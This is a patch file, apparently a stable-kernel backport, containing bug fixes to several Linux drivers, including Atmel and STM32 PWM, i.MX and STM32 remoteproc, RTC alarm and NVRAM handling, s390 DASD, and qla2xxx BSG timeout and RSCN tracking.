+diff --git a/drivers/platform/mips/cpu_hwmon.c b/drivers/platform/mips/cpu_hwmon.c
+index d8c5f9195f85f..2ac2f31090f96 100644
+--- a/drivers/platform/mips/cpu_hwmon.c
++++ b/drivers/platform/mips/cpu_hwmon.c
+@@ -139,6 +139,9 @@ static int __init loongson_hwmon_init(void)
+ 		csr_temp_enable = csr_readl(LOONGSON_CSR_FEATURES) &
+ 				  LOONGSON_CSRF_TEMP;
+ 
++	if (!csr_temp_enable && !loongson_chiptemp[0])
++		return -ENODEV;
++
+ 	nr_packages = loongson_sysconf.nr_cpus /
+ 		loongson_sysconf.cores_per_package;
+ 
+diff --git a/drivers/pwm/pwm-atmel-tcb.c b/drivers/pwm/pwm-atmel-tcb.c
+index 2826fc216d291..e74b45f00a9ac 100644
+--- a/drivers/pwm/pwm-atmel-tcb.c
++++ b/drivers/pwm/pwm-atmel-tcb.c
+@@ -34,7 +34,6 @@
+ 				 ATMEL_TC_BEEVT | ATMEL_TC_BSWTRG)
+ 
+ struct atmel_tcb_pwm_device {
+-	enum pwm_polarity polarity;	/* PWM polarity */
+ 	unsigned div;			/* PWM clock divider */
+ 	unsigned duty;			/* PWM duty expressed in clk cycles */
+ 	unsigned period;		/* PWM period expressed in clk cycles */
+@@ -57,7 +56,7 @@ struct atmel_tcb_pwm_chip {
+ 	struct clk *clk;
+ 	struct clk *gclk;
+ 	struct clk *slow_clk;
+-	struct atmel_tcb_pwm_device *pwms[NPWM];
++	struct atmel_tcb_pwm_device pwms[NPWM];
+ 	struct atmel_tcb_channel bkup;
+ };
+ 
+@@ -68,42 +67,24 @@ static inline struct atmel_tcb_pwm_chip *to_tcb_chip(struct pwm_chip *chip)
+ 	return container_of(chip, struct atmel_tcb_pwm_chip, chip);
+ }
+ 
+-static int atmel_tcb_pwm_set_polarity(struct pwm_chip *chip,
+-				      struct pwm_device *pwm,
+-				      enum pwm_polarity polarity)
+-{
+-	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+-	struct atmel_tcb_pwm_device *tcbpwm = tcbpwmc->pwms[pwm->hwpwm];
+-
+-	tcbpwm->polarity = polarity;
+-
+-	return 0;
+-}
+-
+ static int atmel_tcb_pwm_request(struct pwm_chip *chip,
+ 				 struct pwm_device *pwm)
+ {
+ 	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+-	struct atmel_tcb_pwm_device *tcbpwm;
++	struct atmel_tcb_pwm_device *tcbpwm = &tcbpwmc->pwms[pwm->hwpwm];
+ 	unsigned cmr;
+ 	int ret;
+ 
+-	tcbpwm = devm_kzalloc(chip->dev, sizeof(*tcbpwm), GFP_KERNEL);
+-	if (!tcbpwm)
+-		return -ENOMEM;
+-
+ 	ret = clk_prepare_enable(tcbpwmc->clk);
+-	if (ret) {
+-		devm_kfree(chip->dev, tcbpwm);
++	if (ret)
+ 		return ret;
+-	}
+ 
+-	tcbpwm->polarity = PWM_POLARITY_NORMAL;
+ 	tcbpwm->duty = 0;
+ 	tcbpwm->period = 0;
+ 	tcbpwm->div = 0;
+ 
+-	spin_lock(&tcbpwmc->lock);
++	guard(spinlock)(&tcbpwmc->lock);
++
+ 	regmap_read(tcbpwmc->regmap, ATMEL_TC_REG(tcbpwmc->channel, CMR), &cmr);
+ 	/*
+ 	 * Get init config from Timer Counter registers if
+@@ -129,9 +110,6 @@ static int atmel_tcb_pwm_request(struct pwm_chip *chip,
+ 
+ 	cmr |= ATMEL_TC_WAVE | ATMEL_TC_WAVESEL_UP_AUTO | ATMEL_TC_EEVT_XC0;
+ 	regmap_write(tcbpwmc->regmap, ATMEL_TC_REG(tcbpwmc->channel, CMR), cmr);
+-	spin_unlock(&tcbpwmc->lock);
+-
+-	tcbpwmc->pwms[pwm->hwpwm] = tcbpwm;
+ 
+ 	return 0;
+ }
+@@ -139,19 +117,16 @@ static int atmel_tcb_pwm_request(struct pwm_chip *chip,
+ static void atmel_tcb_pwm_free(struct pwm_chip *chip, struct pwm_device *pwm)
+ {
+ 	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+-	struct atmel_tcb_pwm_device *tcbpwm = tcbpwmc->pwms[pwm->hwpwm];
+ 
+ 	clk_disable_unprepare(tcbpwmc->clk);
+-	tcbpwmc->pwms[pwm->hwpwm] = NULL;
+-	devm_kfree(chip->dev, tcbpwm);
+ }
+ 
+-static void atmel_tcb_pwm_disable(struct pwm_chip *chip, struct pwm_device *pwm)
++static void atmel_tcb_pwm_disable(struct pwm_chip *chip, struct pwm_device *pwm,
++				  enum pwm_polarity polarity)
+ {
+ 	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+-	struct atmel_tcb_pwm_device *tcbpwm = tcbpwmc->pwms[pwm->hwpwm];
++	struct atmel_tcb_pwm_device *tcbpwm = &tcbpwmc->pwms[pwm->hwpwm];
+ 	unsigned cmr;
+-	enum pwm_polarity polarity = tcbpwm->polarity;
+ 
+ 	/*
+ 	 * If duty is 0 the timer will be stopped and we have to
+@@ -164,7 +139,6 @@ static void atmel_tcb_pwm_disable(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	if (tcbpwm->duty == 0)
+ 		polarity = !polarity;
+ 
+-	spin_lock(&tcbpwmc->lock);
+ 	regmap_read(tcbpwmc->regmap, ATMEL_TC_REG(tcbpwmc->channel, CMR), &cmr);
+ 
+ 	/* flush old setting and set the new one */
+@@ -199,16 +173,14 @@ static void atmel_tcb_pwm_disable(struct pwm_chip *chip, struct pwm_device *pwm)
+ 			     ATMEL_TC_SWTRG);
+ 		tcbpwmc->bkup.enabled = 0;
+ 	}
+-
+-	spin_unlock(&tcbpwmc->lock);
+ }
+ 
+-static int atmel_tcb_pwm_enable(struct pwm_chip *chip, struct pwm_device *pwm)
++static int atmel_tcb_pwm_enable(struct pwm_chip *chip, struct pwm_device *pwm,
++				enum pwm_polarity polarity)
+ {
+ 	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+-	struct atmel_tcb_pwm_device *tcbpwm = tcbpwmc->pwms[pwm->hwpwm];
++	struct atmel_tcb_pwm_device *tcbpwm = &tcbpwmc->pwms[pwm->hwpwm];
+ 	u32 cmr;
+-	enum pwm_polarity polarity = tcbpwm->polarity;
+ 
+ 	/*
+ 	 * If duty is 0 the timer will be stopped and we have to
+@@ -221,7 +193,6 @@ static int atmel_tcb_pwm_enable(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	if (tcbpwm->duty == 0)
+ 		polarity = !polarity;
+ 
+-	spin_lock(&tcbpwmc->lock);
+ 	regmap_read(tcbpwmc->regmap, ATMEL_TC_REG(tcbpwmc->channel, CMR), &cmr);
+ 
+ 	/* flush old setting and set the new one */
+@@ -283,7 +254,6 @@ static int atmel_tcb_pwm_enable(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	regmap_write(tcbpwmc->regmap, ATMEL_TC_REG(tcbpwmc->channel, CCR),
+ 		     ATMEL_TC_SWTRG | ATMEL_TC_CLKEN);
+ 	tcbpwmc->bkup.enabled = 1;
+-	spin_unlock(&tcbpwmc->lock);
+ 	return 0;
+ }
+ 
+@@ -291,7 +261,7 @@ static int atmel_tcb_pwm_config(struct pwm_chip *chip, struct pwm_device *pwm,
+ 				int duty_ns, int period_ns)
+ {
+ 	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+-	struct atmel_tcb_pwm_device *tcbpwm = tcbpwmc->pwms[pwm->hwpwm];
++	struct atmel_tcb_pwm_device *tcbpwm = &tcbpwmc->pwms[pwm->hwpwm];
+ 	struct atmel_tcb_pwm_device *atcbpwm = NULL;
+ 	int i = 0;
+ 	int slowclk = 0;
+@@ -338,9 +308,9 @@ static int atmel_tcb_pwm_config(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	period = div_u64(period_ns, min);
+ 
+ 	if (pwm->hwpwm == 0)
+-		atcbpwm = tcbpwmc->pwms[1];
++		atcbpwm = &tcbpwmc->pwms[1];
+ 	else
+-		atcbpwm = tcbpwmc->pwms[0];
++		atcbpwm = &tcbpwmc->pwms[0];
+ 
+ 	/*
+ 	 * PWM devices provided by the TCB driver are grouped by 2.
+@@ -368,14 +338,14 @@ static int atmel_tcb_pwm_config(struct pwm_chip *chip, struct pwm_device *pwm,
+ static int atmel_tcb_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 			       const struct pwm_state *state)
+ {
++	struct atmel_tcb_pwm_chip *tcbpwmc = to_tcb_chip(chip);
+ 	int duty_cycle, period;
+ 	int ret;
+ 
+-	/* This function only sets a flag in driver data */
+-	atmel_tcb_pwm_set_polarity(chip, pwm, state->polarity);
++	guard(spinlock)(&tcbpwmc->lock);
+ 
+ 	if (!state->enabled) {
+-		atmel_tcb_pwm_disable(chip, pwm);
++		atmel_tcb_pwm_disable(chip, pwm, state->polarity);
+ 		return 0;
+ 	}
+ 
+@@ -386,7 +356,7 @@ static int atmel_tcb_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	if (ret)
+ 		return ret;
+ 
+-	return atmel_tcb_pwm_enable(chip, pwm);
++	return atmel_tcb_pwm_enable(chip, pwm, state->polarity);
+ }
+ 
+ static const struct pwm_ops atmel_tcb_pwm_ops = {
+diff --git a/drivers/pwm/pwm-stm32.c b/drivers/pwm/pwm-stm32.c
+index c40a6548ce7d4..2070d107c6328 100644
+--- a/drivers/pwm/pwm-stm32.c
++++ b/drivers/pwm/pwm-stm32.c
+@@ -452,8 +452,9 @@ static int stm32_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	enabled = pwm->state.enabled;
+ 
+-	if (enabled && !state->enabled) {
+-		stm32_pwm_disable(priv, pwm->hwpwm);
++	if (!state->enabled) {
++		if (enabled)
++			stm32_pwm_disable(priv, pwm->hwpwm);
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/remoteproc/imx_rproc.c b/drivers/remoteproc/imx_rproc.c
+index 8a2a7112678c2..bc26fe5416627 100644
+--- a/drivers/remoteproc/imx_rproc.c
++++ b/drivers/remoteproc/imx_rproc.c
+@@ -596,31 +596,37 @@ static int imx_rproc_addr_init(struct imx_rproc *priv,
+ 		struct resource res;
+ 
+ 		node = of_parse_phandle(np, "memory-region", a);
++		if (!node)
++			continue;
+ 		/* Not map vdevbuffer, vdevring region */
+ 		if (!strncmp(node->name, "vdev", strlen("vdev"))) {
+ 			of_node_put(node);
+ 			continue;
+ 		}
+ 		err = of_address_to_resource(node, 0, &res);
+-		of_node_put(node);
+ 		if (err) {
+ 			dev_err(dev, "unable to resolve memory region\n");
++			of_node_put(node);
+ 			return err;
+ 		}
+ 
+-		if (b >= IMX_RPROC_MEM_MAX)
++		if (b >= IMX_RPROC_MEM_MAX) {
++			of_node_put(node);
+ 			break;
++		}
+ 
+ 		/* Not use resource version, because we might share region */
+ 		priv->mem[b].cpu_addr = devm_ioremap_wc(&pdev->dev, res.start, resource_size(&res));
+ 		if (!priv->mem[b].cpu_addr) {
+ 			dev_err(dev, "failed to remap %pr\n", &res);
++			of_node_put(node);
+ 			return -ENOMEM;
+ 		}
+ 		priv->mem[b].sys_addr = res.start;
+ 		priv->mem[b].size = resource_size(&res);
+ 		if (!strcmp(node->name, "rsc-table"))
+ 			priv->rsc_table = priv->mem[b].cpu_addr;
++		of_node_put(node);
+ 		b++;
+ 	}
+ 
+diff --git a/drivers/remoteproc/stm32_rproc.c b/drivers/remoteproc/stm32_rproc.c
+index 74da0393172c5..d88220a8fb0c3 100644
+--- a/drivers/remoteproc/stm32_rproc.c
++++ b/drivers/remoteproc/stm32_rproc.c
+@@ -293,7 +293,7 @@ static void stm32_rproc_mb_vq_work(struct work_struct *work)
+ 
+ 	mutex_lock(&rproc->lock);
+ 
+-	if (rproc->state != RPROC_RUNNING)
++	if (rproc->state != RPROC_RUNNING && rproc->state != RPROC_ATTACHED)
+ 		goto unlock_mutex;
+ 
+ 	if (rproc_vq_interrupt(rproc, mb->vq_id) == IRQ_NONE)
+diff --git a/drivers/rtc/interface.c b/drivers/rtc/interface.c
+index 3d0fbc644f578..c928037bf6f3a 100644
+--- a/drivers/rtc/interface.c
++++ b/drivers/rtc/interface.c
+@@ -274,10 +274,9 @@ int __rtc_read_alarm(struct rtc_device *rtc, struct rtc_wkalrm *alarm)
+ 			return err;
+ 
+ 		/* full-function RTCs won't have such missing fields */
+-		if (rtc_valid_tm(&alarm->time) == 0) {
+-			rtc_add_offset(rtc, &alarm->time);
+-			return 0;
+-		}
++		err = rtc_valid_tm(&alarm->time);
++		if (!err)
++			goto done;
+ 
+ 		/* get the "after" timestamp, to detect wrapped fields */
+ 		err = rtc_read_time(rtc, &now);
+@@ -379,6 +378,8 @@ int __rtc_read_alarm(struct rtc_device *rtc, struct rtc_wkalrm *alarm)
+ 	if (err)
+ 		dev_warn(&rtc->dev, "invalid alarm value: %ptR\n",
+ 			 &alarm->time);
++	else
++		rtc_add_offset(rtc, &alarm->time);
+ 
+ 	return err;
+ }
+diff --git a/drivers/rtc/rtc-cmos.c b/drivers/rtc/rtc-cmos.c
+index e0a798923ce0e..542568cd72b32 100644
+--- a/drivers/rtc/rtc-cmos.c
++++ b/drivers/rtc/rtc-cmos.c
+@@ -643,11 +643,10 @@ static int cmos_nvram_read(void *priv, unsigned int off, void *val,
+ 			   size_t count)
+ {
+ 	unsigned char *buf = val;
+-	int	retval;
+ 
+ 	off += NVRAM_OFFSET;
+ 	spin_lock_irq(&rtc_lock);
+-	for (retval = 0; count; count--, off++, retval++) {
++	for (; count; count--, off++) {
+ 		if (off < 128)
+ 			*buf++ = CMOS_READ(off);
+ 		else if (can_bank2)
+@@ -657,7 +656,7 @@ static int cmos_nvram_read(void *priv, unsigned int off, void *val,
+ 	}
+ 	spin_unlock_irq(&rtc_lock);
+ 
+-	return retval;
++	return count ? -EIO : 0;
+ }
+ 
+ static int cmos_nvram_write(void *priv, unsigned int off, void *val,
+@@ -665,7 +664,6 @@ static int cmos_nvram_write(void *priv, unsigned int off, void *val,
+ {
+ 	struct cmos_rtc	*cmos = priv;
+ 	unsigned char	*buf = val;
+-	int		retval;
+ 
+ 	/* NOTE:  on at least PCs and Ataris, the boot firmware uses a
+ 	 * checksum on part of the NVRAM data.  That's currently ignored
+@@ -674,7 +672,7 @@ static int cmos_nvram_write(void *priv, unsigned int off, void *val,
+ 	 */
+ 	off += NVRAM_OFFSET;
+ 	spin_lock_irq(&rtc_lock);
+-	for (retval = 0; count; count--, off++, retval++) {
++	for (; count; count--, off++) {
+ 		/* don't trash RTC registers */
+ 		if (off == cmos->day_alrm
+ 				|| off == cmos->mon_alrm
+@@ -689,7 +687,7 @@ static int cmos_nvram_write(void *priv, unsigned int off, void *val,
+ 	}
+ 	spin_unlock_irq(&rtc_lock);
+ 
+-	return retval;
++	return count ? -EIO : 0;
+ }
+ 
+ /*----------------------------------------------------------------*/
+diff --git a/drivers/rtc/rtc-isl1208.c b/drivers/rtc/rtc-isl1208.c
+index f448a525333e1..2615b2cf8334a 100644
+--- a/drivers/rtc/rtc-isl1208.c
++++ b/drivers/rtc/rtc-isl1208.c
+@@ -743,14 +743,13 @@ static int isl1208_nvmem_read(void *priv, unsigned int off, void *buf,
+ {
+ 	struct isl1208_state *isl1208 = priv;
+ 	struct i2c_client *client = to_i2c_client(isl1208->rtc->dev.parent);
+-	int ret;
+ 
+ 	/* nvmem sanitizes offset/count for us, but count==0 is possible */
+ 	if (!count)
+ 		return count;
+-	ret = isl1208_i2c_read_regs(client, ISL1208_REG_USR1 + off, buf,
++
++	return isl1208_i2c_read_regs(client, ISL1208_REG_USR1 + off, buf,
+ 				    count);
+-	return ret == 0 ? count : ret;
+ }
+ 
+ static int isl1208_nvmem_write(void *priv, unsigned int off, void *buf,
+@@ -758,15 +757,13 @@ static int isl1208_nvmem_write(void *priv, unsigned int off, void *buf,
+ {
+ 	struct isl1208_state *isl1208 = priv;
+ 	struct i2c_client *client = to_i2c_client(isl1208->rtc->dev.parent);
+-	int ret;
+ 
+ 	/* nvmem sanitizes off/count for us, but count==0 is possible */
+ 	if (!count)
+ 		return count;
+-	ret = isl1208_i2c_set_regs(client, ISL1208_REG_USR1 + off, buf,
+-				   count);
+ 
+-	return ret == 0 ? count : ret;
++	return isl1208_i2c_set_regs(client, ISL1208_REG_USR1 + off, buf,
++				   count);
+ }
+ 
+ static const struct nvmem_config isl1208_nvmem_config = {
+diff --git a/drivers/s390/block/dasd_devmap.c b/drivers/s390/block/dasd_devmap.c
+index b2a4c34330573..1129f6ae98b57 100644
+--- a/drivers/s390/block/dasd_devmap.c
++++ b/drivers/s390/block/dasd_devmap.c
+@@ -2135,13 +2135,19 @@ static ssize_t dasd_copy_pair_store(struct device *dev,
+ 
+ 	/* allocate primary devmap if needed */
+ 	prim_devmap = dasd_find_busid(prim_busid);
+-	if (IS_ERR(prim_devmap))
++	if (IS_ERR(prim_devmap)) {
+ 		prim_devmap = dasd_add_busid(prim_busid, DASD_FEATURE_DEFAULT);
++		if (IS_ERR(prim_devmap))
++			return PTR_ERR(prim_devmap);
++	}
+ 
+ 	/* allocate secondary devmap if needed */
+ 	sec_devmap = dasd_find_busid(sec_busid);
+-	if (IS_ERR(sec_devmap))
++	if (IS_ERR(sec_devmap)) {
+ 		sec_devmap = dasd_add_busid(sec_busid, DASD_FEATURE_DEFAULT);
++		if (IS_ERR(sec_devmap))
++			return PTR_ERR(sec_devmap);
++	}
+ 
+ 	/* setting copy relation is only allowed for offline secondary */
+ 	if (sec_devmap->device)
+diff --git a/drivers/scsi/qla2xxx/qla_bsg.c b/drivers/scsi/qla2xxx/qla_bsg.c
+index 19bb64bdd88b1..52dc9604f5674 100644
+--- a/drivers/scsi/qla2xxx/qla_bsg.c
++++ b/drivers/scsi/qla2xxx/qla_bsg.c
+@@ -324,7 +324,7 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 		    "request_sg_cnt=%x reply_sg_cnt=%x.\n",
+ 		    bsg_job->request_payload.sg_cnt,
+ 		    bsg_job->reply_payload.sg_cnt);
+-		rval = -EPERM;
++		rval = -ENOBUFS;
+ 		goto done;
+ 	}
+ 
+@@ -3059,17 +3059,61 @@ qla24xx_bsg_request(struct bsg_job *bsg_job)
+ 	return ret;
+ }
+ 
+-int
+-qla24xx_bsg_timeout(struct bsg_job *bsg_job)
++static bool qla_bsg_found(struct qla_qpair *qpair, struct bsg_job *bsg_job)
+ {
++	bool found = false;
+ 	struct fc_bsg_reply *bsg_reply = bsg_job->reply;
+ 	scsi_qla_host_t *vha = shost_priv(fc_bsg_to_shost(bsg_job));
+ 	struct qla_hw_data *ha = vha->hw;
+-	srb_t *sp;
+-	int cnt, que;
++	srb_t *sp = NULL;
++	int cnt;
+ 	unsigned long flags;
+ 	struct req_que *req;
+ 
++	spin_lock_irqsave(qpair->qp_lock_ptr, flags);
++	req = qpair->req;
++
++	for (cnt = 1; cnt < req->num_outstanding_cmds; cnt++) {
++		sp = req->outstanding_cmds[cnt];
++		if (sp &&
++		    (sp->type == SRB_CT_CMD ||
++		     sp->type == SRB_ELS_CMD_HST ||
++		     sp->type == SRB_ELS_CMD_HST_NOLOGIN) &&
++		    sp->u.bsg_job == bsg_job) {
++			req->outstanding_cmds[cnt] = NULL;
++			spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
++
++			if (!ha->flags.eeh_busy && ha->isp_ops->abort_command(sp)) {
++				ql_log(ql_log_warn, vha, 0x7089,
++						"mbx abort_command failed.\n");
++				bsg_reply->result = -EIO;
++			} else {
++				ql_dbg(ql_dbg_user, vha, 0x708a,
++						"mbx abort_command success.\n");
++				bsg_reply->result = 0;
++			}
++			/* ref: INIT */
++			kref_put(&sp->cmd_kref, qla2x00_sp_release);
++
++			found = true;
++			goto done;
++		}
++	}
++	spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
++
++done:
++	return found;
++}
++
++int
++qla24xx_bsg_timeout(struct bsg_job *bsg_job)
++{
++	struct fc_bsg_reply *bsg_reply = bsg_job->reply;
++	scsi_qla_host_t *vha = shost_priv(fc_bsg_to_shost(bsg_job));
++	struct qla_hw_data *ha = vha->hw;
++	int i;
++	struct qla_qpair *qpair;
++
+ 	ql_log(ql_log_info, vha, 0x708b, "%s CMD timeout. bsg ptr %p.\n",
+ 	    __func__, bsg_job);
+ 
+@@ -3079,48 +3123,22 @@ qla24xx_bsg_timeout(struct bsg_job *bsg_job)
+ 		qla_pci_set_eeh_busy(vha);
+ 	}
+ 
++	if (qla_bsg_found(ha->base_qpair, bsg_job))
++		goto done;
++
+ 	/* find the bsg job from the active list of commands */
+-	spin_lock_irqsave(&ha->hardware_lock, flags);
+-	for (que = 0; que < ha->max_req_queues; que++) {
+-		req = ha->req_q_map[que];
+-		if (!req)
++	for (i = 0; i < ha->max_qpairs; i++) {
++		qpair = vha->hw->queue_pair_map[i];
++		if (!qpair)
+ 			continue;
+-
+-		for (cnt = 1; cnt < req->num_outstanding_cmds; cnt++) {
+-			sp = req->outstanding_cmds[cnt];
+-			if (sp &&
+-			    (sp->type == SRB_CT_CMD ||
+-			     sp->type == SRB_ELS_CMD_HST ||
+-			     sp->type == SRB_ELS_CMD_HST_NOLOGIN ||
+-			     sp->type == SRB_FXIOCB_BCMD) &&
+-			    sp->u.bsg_job == bsg_job) {
+-				req->outstanding_cmds[cnt] = NULL;
+-				spin_unlock_irqrestore(&ha->hardware_lock, flags);
+-
+-				if (!ha->flags.eeh_busy && ha->isp_ops->abort_command(sp)) {
+-					ql_log(ql_log_warn, vha, 0x7089,
+-					    "mbx abort_command failed.\n");
+-					bsg_reply->result = -EIO;
+-				} else {
+-					ql_dbg(ql_dbg_user, vha, 0x708a,
+-					    "mbx abort_command success.\n");
+-					bsg_reply->result = 0;
+-				}
+-				spin_lock_irqsave(&ha->hardware_lock, flags);
+-				goto done;
+-
+-			}
+-		}
++		if (qla_bsg_found(qpair, bsg_job))
++			goto done;
+ 	}
+-	spin_unlock_irqrestore(&ha->hardware_lock, flags);
++
+ 	ql_log(ql_log_info, vha, 0x708b, "SRB not found to abort.\n");
+ 	bsg_reply->result = -ENXIO;
+-	return 0;
+ 
+ done:
+-	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+-	/* ref: INIT */
+-	kref_put(&sp->cmd_kref, qla2x00_sp_release);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index 31c451daeeb82..8490181424c75 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -3278,6 +3278,8 @@ struct fab_scan_rp {
+ struct fab_scan {
+ 	struct fab_scan_rp *l;
+ 	u32 size;
++	u32 rscn_gen_start;
++	u32 rscn_gen_end;
+ 	u16 scan_retry;
+ #define MAX_SCAN_RETRIES 5
+ 	enum scan_flags_t scan_flags;
+@@ -4985,6 +4987,7 @@ typedef struct scsi_qla_host {
+ 
+ 	/* Counter to detect races between ELS and RSCN events */
+ 	atomic_t		generation_tick;
++	atomic_t		rscn_gen;
+ 	/* Time when global fcport update has been scheduled */
+ 	int			total_fcport_update_gen;
+ 	/* List of pending LOGOs, protected by tgt_mutex */
+diff --git a/drivers/scsi/qla2xxx/qla_gs.c b/drivers/scsi/qla2xxx/qla_gs.c
+index 64ab070b87166..9c707d677f648 100644
+--- a/drivers/scsi/qla2xxx/qla_gs.c
++++ b/drivers/scsi/qla2xxx/qla_gs.c
+@@ -1710,7 +1710,7 @@ qla2x00_hba_attributes(scsi_qla_host_t *vha, void *entries,
+ 	eiter->type = cpu_to_be16(FDMI_HBA_OPTION_ROM_VERSION);
+ 	alen = scnprintf(
+ 		eiter->a.orom_version, sizeof(eiter->a.orom_version),
+-		"%d.%02d", ha->bios_revision[1], ha->bios_revision[0]);
++		"%d.%02d", ha->efi_revision[1], ha->efi_revision[0]);
+ 	alen += FDMI_ATTR_ALIGNMENT(alen);
+ 	alen += FDMI_ATTR_TYPELEN(eiter);
+ 	eiter->len = cpu_to_be16(alen);
+@@ -3465,6 +3465,29 @@ static int qla2x00_is_a_vp(scsi_qla_host_t *vha, u64 wwn)
+ 	return rc;
+ }
+ 
++static bool qla_ok_to_clear_rscn(scsi_qla_host_t *vha, fc_port_t *fcport)
++{
++	u32 rscn_gen;
++
++	rscn_gen = atomic_read(&vha->rscn_gen);
++	ql_dbg(ql_dbg_disc + ql_dbg_verbose, vha, 0x2017,
++	    "%s %d %8phC rscn_gen %x start %x end %x current %x\n",
++	    __func__, __LINE__, fcport->port_name, fcport->rscn_gen,
++	    vha->scan.rscn_gen_start, vha->scan.rscn_gen_end, rscn_gen);
++
++	if (val_is_in_range(fcport->rscn_gen, vha->scan.rscn_gen_start,
++	    vha->scan.rscn_gen_end))
++		/* rscn came in before fabric scan */
++		return true;
++
++	if (val_is_in_range(fcport->rscn_gen, vha->scan.rscn_gen_end, rscn_gen))
++		/* rscn came in after fabric scan */
++		return false;
++
++	/* rare: fcport's scan_needed + rscn_gen must be stale */
++	return true;
++}
++
+ void qla24xx_async_gnnft_done(scsi_qla_host_t *vha, srb_t *sp)
+ {
+ 	fc_port_t *fcport;
+@@ -3578,10 +3601,10 @@ void qla24xx_async_gnnft_done(scsi_qla_host_t *vha, srb_t *sp)
+ 				   (fcport->scan_needed &&
+ 				    fcport->port_type != FCT_INITIATOR &&
+ 				    fcport->port_type != FCT_NVME_INITIATOR)) {
++				fcport->scan_needed = 0;
+ 				qlt_schedule_sess_for_deletion(fcport);
+ 			}
+ 			fcport->d_id.b24 = rp->id.b24;
+-			fcport->scan_needed = 0;
+ 			break;
+ 		}
+ 
+@@ -3622,7 +3645,9 @@ void qla24xx_async_gnnft_done(scsi_qla_host_t *vha, srb_t *sp)
+ 				do_delete = true;
+ 			}
+ 
+-			fcport->scan_needed = 0;
++			if (qla_ok_to_clear_rscn(vha, fcport))
++				fcport->scan_needed = 0;
++
+ 			if (((qla_dual_mode_enabled(vha) ||
+ 			      qla_ini_mode_enabled(vha)) &&
+ 			    atomic_read(&fcport->state) == FCS_ONLINE) ||
+@@ -3652,7 +3677,9 @@ void qla24xx_async_gnnft_done(scsi_qla_host_t *vha, srb_t *sp)
+ 					    fcport->port_name, fcport->loop_id,
+ 					    fcport->login_retry);
+ 				}
+-				fcport->scan_needed = 0;
++
++				if (qla_ok_to_clear_rscn(vha, fcport))
++					fcport->scan_needed = 0;
+ 				qla24xx_fcport_handle_login(vha, fcport);
+ 			}
+ 		}
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 6dce3f166564c..a65c601608209 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -1843,10 +1843,18 @@ int qla24xx_post_newsess_work(struct scsi_qla_host *vha, port_id_t *id,
+ 	return qla2x00_post_work(vha, e);
+ }
+ 
++static void qla_rscn_gen_tick(scsi_qla_host_t *vha, u32 *ret_rscn_gen)
++{
++	*ret_rscn_gen = atomic_inc_return(&vha->rscn_gen);
++	/* memory barrier */
++	wmb();
++}
++
+ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ {
+ 	fc_port_t *fcport;
+ 	unsigned long flags;
++	u32 rscn_gen;
+ 
+ 	switch (ea->id.b.rsvd_1) {
+ 	case RSCN_PORT_ADDR:
+@@ -1876,15 +1884,16 @@ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ 					 * Otherwise we're already in the middle of a relogin
+ 					 */
+ 					fcport->scan_needed = 1;
+-					fcport->rscn_gen++;
++					qla_rscn_gen_tick(vha, &fcport->rscn_gen);
+ 				}
+ 			} else {
+ 				fcport->scan_needed = 1;
+-				fcport->rscn_gen++;
++				qla_rscn_gen_tick(vha, &fcport->rscn_gen);
+ 			}
+ 		}
+ 		break;
+ 	case RSCN_AREA_ADDR:
++		qla_rscn_gen_tick(vha, &rscn_gen);
+ 		list_for_each_entry(fcport, &vha->vp_fcports, list) {
+ 			if (fcport->flags & FCF_FCP2_DEVICE &&
+ 			    atomic_read(&fcport->state) == FCS_ONLINE)
+@@ -1892,11 +1901,12 @@ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ 
+ 			if ((ea->id.b24 & 0xffff00) == (fcport->d_id.b24 & 0xffff00)) {
+ 				fcport->scan_needed = 1;
+-				fcport->rscn_gen++;
++				fcport->rscn_gen = rscn_gen;
+ 			}
+ 		}
+ 		break;
+ 	case RSCN_DOM_ADDR:
++		qla_rscn_gen_tick(vha, &rscn_gen);
+ 		list_for_each_entry(fcport, &vha->vp_fcports, list) {
+ 			if (fcport->flags & FCF_FCP2_DEVICE &&
+ 			    atomic_read(&fcport->state) == FCS_ONLINE)
+@@ -1904,19 +1914,20 @@ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ 
+ 			if ((ea->id.b24 & 0xff0000) == (fcport->d_id.b24 & 0xff0000)) {
+ 				fcport->scan_needed = 1;
+-				fcport->rscn_gen++;
++				fcport->rscn_gen = rscn_gen;
+ 			}
+ 		}
+ 		break;
+ 	case RSCN_FAB_ADDR:
+ 	default:
++		qla_rscn_gen_tick(vha, &rscn_gen);
+ 		list_for_each_entry(fcport, &vha->vp_fcports, list) {
+ 			if (fcport->flags & FCF_FCP2_DEVICE &&
+ 			    atomic_read(&fcport->state) == FCS_ONLINE)
+ 				continue;
+ 
+ 			fcport->scan_needed = 1;
+-			fcport->rscn_gen++;
++			fcport->rscn_gen = rscn_gen;
+ 		}
+ 		break;
+ 	}
